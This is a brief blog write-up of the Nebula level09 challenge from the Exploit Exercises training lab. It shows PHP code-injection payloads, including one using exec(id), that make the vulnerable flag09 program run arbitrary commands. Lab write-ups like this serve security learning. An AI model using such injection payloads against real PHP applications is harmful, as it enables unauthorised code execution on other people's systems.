Thursday, June 30, 2016

Exploit Exercises - nebula level09

Exploit Exercises - nebula level09



flag09 reads the file supplied as arg1. We also need to supply a second arg but it is not used. If we do not supply arg2, an error is thrown but file specified by arg1 is still read.


After trial & error, found the correct syntax that flag09 accepts.
    [email $phpinfo()]

This makes flag09 treat the phpinfo() as a valid variable - but throws an error.



Success - 0.1 - found correct syntax to get phpinfo() executed ->
    [email {${phpinfo()}}]



Success - using php’s exec() method to execute getflag/id
    [email {${exec(id)}}]


+++++

No comments:

Post a Comment

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.